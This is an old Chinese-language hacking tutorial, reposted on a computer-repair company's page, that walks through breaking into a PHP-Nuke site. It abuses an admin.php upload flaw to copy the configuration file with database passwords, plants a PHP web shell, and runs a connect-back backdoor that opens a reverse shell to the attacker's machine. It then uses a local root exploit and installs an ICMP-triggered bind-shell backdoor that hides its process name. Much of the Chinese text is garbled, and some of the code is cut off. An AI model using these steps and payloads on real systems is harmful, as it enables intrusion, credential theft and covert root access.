学习利用phpnuke的漏洞做坏事
我在google上搜了搜admin.php(多找找吧,这用的工夫会很长)。哈~~瞥见
一个cshu.51.net/admin.php?
(这是假的了谁会用本身的巢干活啊-西~~~)在下面就上admin登岸界面,在ie上copy:csh
u.51.net/admin.php?upload=1&
file=config.php&file_name=cshu.txt&wdir=/images/&userfile=config.php&userfile_na
me=cshu.txt
————用猫干活好慢啊!(乘这时表明一下下面的东东是what意思,就是
把phpnuke的配制文件copy到/ima
ges/cshu.txt下啦!)瞥见filemanager界面了吗?这是上传文件的界面。但是(最讨厌的事
呈现了)有时在页面的顶部呈现了
一些错误信息,这一样平常是/images/没写的权先,怎摸办?那就找有权先的目次,在wdir=这改
改比如:wdir=/images/xxxxx/dd
dd或wdir=/../xxx/,还有../../../../看到你nobody权先能看到的所有目次。找到的目次一
定能用ie拜访到哦,我找如许的目
录花了我1.8元(一个小时),成功后能在这个目次下看到一个cshu.txt的文件,打开看看c
shu.51.net/xxx/images/cshu.txt
片断
$AllowableHTML = array("p"=>2, "b"=>1, "i"=>1, "a"=>2, "em"=>1, "br"=>1,
"strong"=>1, "blockquote"=>1, "tt"=>1, "li"=>1, "ol"=>1, "ul"=>1);
######################################################################
(1=Yes 0=No This will display a new box in Statistics page with relevant server
info)
$Ephemerids = 0; $advancedstats = 0;
固然包罗sql密码等敏感信息。但我不会用(你信吗?)。然后~~~上传文件phpshell.ph
p或
cmd.cgi只要server上支持我上传了cmd.php
------------test1.php------------
echo"
";
system("$cmd");
echo"
";
?>
------------test1.php----------
学san的。
输入cshu.51.net/xxx/images/cmd.php?cmd=id
看到了吧
uid=60001(nobody) gid=60001(nobody)
如许也可以看到passwd但现在谁想去cracker啊
上传个bindshell吧
/*
**
** Digit-Labs Connect-Back Backdoor - digit-labs.org
** - (c) All rights reserved
**
** Use this backdoor to access machines behind
** firewalls.
**
** [step 1] -
** setup a listening port on your box e.g:
** >nc -l -p 4000
**
** [step 2] -
** Issue the following command:
** >./cbd
**
*/
int fd, sock;
int port = 4000; <---可改改
struct sockaddr_in addr;
char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n \
* Connected to Commandline...\n";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
while(argc < 2) {
fprintf(stderr, "\n %s \n\n", argv[0]);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "httpd.", 0); "httpd."<---可改改,免得别人发明就欠好
close(fd);
return 1;
}
不错吧!还可以绕过方火墙。
上传——————backdoor.c
在俺机上开个窗
c:\nc -l -vv -p 4000 \n
cshu.51.net/xxx/images/cmd.php?cmd=cc -o back backdoor.c
cshu.51.net/xxx/images/cmd.php?cmd=./back xxx.xxx.xx.xx(我的ip)
在看俺的窗
c:\nc -l -vv -p 4000
listening on [any] 4000 ...
connect to [*.*.*.*] from www.server.net [*.*.*.*] 2259
[ Digit-Labs Connect-Back Backdoor ]
* Connected to Commandline...
ls <-----熟习了吧
别忘了还是nobody呢!!!
w
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
没人!(愉快)开始了~~~
uname -a
Linux grasshopper.tellus.nl 2.2.17-21mdksecure #1 SMP Thu Oct 5 12:52:38 CEST
2000
i686 unknown
cd /usr/include/i586-mandrake-2.2.17/
哦是mandrakelinux
到e4gle.org那去找个local溢出的程http://e4gle.org/exploit/os/linux/mandrake/7.2/epcs2.c ;
上传---------epcs2.c
cc -o x epcs2.c
./x
bug exploited successfully.
nenjoy
cd /root
ls
README_FIRST
admin
装个后门就lion写的谁人吧
,have a goodluck.:) \r\n====================================\r\n\r\nyour comman
d: \0"
void child_kill();
int bind_shell();
int main(int argc, char *argv[])
{
int s, size, fromlen;
char pkt[4096];
struct protoent *proto;
struct sockaddr_in from;
signal(SIGHUP,SIG_IGN);
signal(SIGCHLD, child_kill);
if (fork() != 0) exit(0);
proto = getprotobyname("icmp");
/* can't creat raw socket */
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
exit(0);
/* waiting for packets */
while(1)
{
strcpy (argv[0], HIDEME);
do
{
fromlen = sizeof(from);
if ((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *) &from, &fr
omlen)) < 0)
printf("", size-28);
} while (size != SIZEPACK + 28);
/* size == SIZEPACK, let's bind the shell on your port :)*/
switch(fork())
{
case -1:
continue;
case 0:
strcpy (argv[0], HIDEIDS);
bind_shell();
exit(0);
}
sleep(100);
}
}
void child_kill()
{
wait(NULL);
signal(SIGCHLD, child_kill);
}
int bind_shell()
{
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
char passwd[15];
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
chdir("/");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1)
{
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0)
{
recv(soc_cli, passwd, sizeof(passwd), 0);
for (i = 0; i < strlen(passwd); i++)
{
if (passwd == '\n' || passwd == '\r')
{
passwd = '\0';
}
}
if (strcmp(passwd, PASSWORD) != 0)
{
close(soc_cli);
return 0;
}
write(soc_cli,MESSAGE,strlen(MESSAGE));
for (i = 0; i < 3; i++)
{
dup2(soc_cli, i);
}
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
return 1;
}
close(soc_cli);
}
return 0;
}
尝尝~
cc -o 12 ping.c
./12
回到家
ping -l 101 cshu.51.net
telnet cshu.51.net 10396
fuck&fuck <---密码
====================================
You get it ,have a goodluck.:)
====================================
your command:ls;
README_FIRST
admin
不要忘了“;”哦要不然她会不听话的
如果在linux下就用
ping -s 101 -c 4 cshu.51.net
恩就如许
擦擦pp就本身搞吧很多如许的软件。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
